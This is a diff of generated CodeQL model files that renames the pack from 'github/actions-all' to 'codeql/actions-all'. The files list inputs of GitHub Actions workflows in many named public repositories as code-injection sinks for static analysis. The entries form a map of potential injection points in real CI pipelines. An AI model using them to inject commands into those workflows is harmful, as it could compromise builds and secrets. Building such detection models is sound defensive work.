diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index ec5b1a4e50c..9dbd2fce989 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 2f0bb66127b..7722a635307 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 65953f0387a..4fc41527037 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 035e331a007..729aa139693 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 1cf431a7573..e08457ef5ea 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 669d7f443b1..c19a1fc3eef 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index b53f0949903..a719b0dc87e 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 4e9af4a1a8e..9a9b3a5d3df 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 3fd31a3612f..3f9b4ea61cc 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 090bf1afc85..6e36f5dea2b 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 47afbc44f76..f1b143d7c44 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 4e173c717e5..42d9df16b35 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 8091471b3c0..386b0aa6ea9 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index a3b3a5624c1..54bf59f0647 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 22264f3f29f..2a2a8fcc206 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index e33a45e698b..05dbdf6bf45 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index a2d5e1ef7a3..4276ce4b98d 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index e0ae2bc70bd..ac210c93a1e 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index 7926fa4e083..501d4a8a45f 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 2369c82bcb7..b582844dc7c 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d388b1a55b3..9de22328187 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index dade6e8c958..7234c3cbd5f 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 9ac87054f10..27ee66eae48 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 3f9f3f63207..96586d29534 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index aff068890ad..5e7e997272d 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 0304e585bb6..8a932612100 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 46950d380cb..494e71db707 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 2e3c2530eba..200f6bbfc43 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 58f3d831423..a542370c7de 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index dfa20e1f9d7..8b529012be2 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 144c4e456dc..defeb5f7974 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 51348fb1b56..7eba6fb3b00 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c3fa787b288..fc8085843dd 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 9845c089b32..2d831ccbced 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 2986040e8cd..b8892f32d7f 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 7dafcd5b71b..3809c827dda 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 1b5fb0e1d97..88f4246b162 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 28ec54f1d9d..35d394a116f 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 21f35339952..234ed7fef07 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 594b0cc9bb9..e9ad23c8331 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index a2fbd510bb2..49ac7d2bf71 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 927cbd449e3..99041db6e26 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 52037a671cf..dd132b20a05 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index b71a87193b6..e87804d0cf8 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 24361a7d29e..0927d449d37 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index be71c38f124..a98bbaed725 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 889edaac1bb..0beb8e432fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index b2b970152de..0d0f030c623 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index f885a44f46e..3574c02b4ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 10f06693d26..1ce82c53df5 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 43d0fe1c2ce..f2eec6681d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 4fb13f0a18c..a4a008154f5 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 96b73aa06de..d85bd42f7a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 554974bfe6f..391b22d8867 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] 
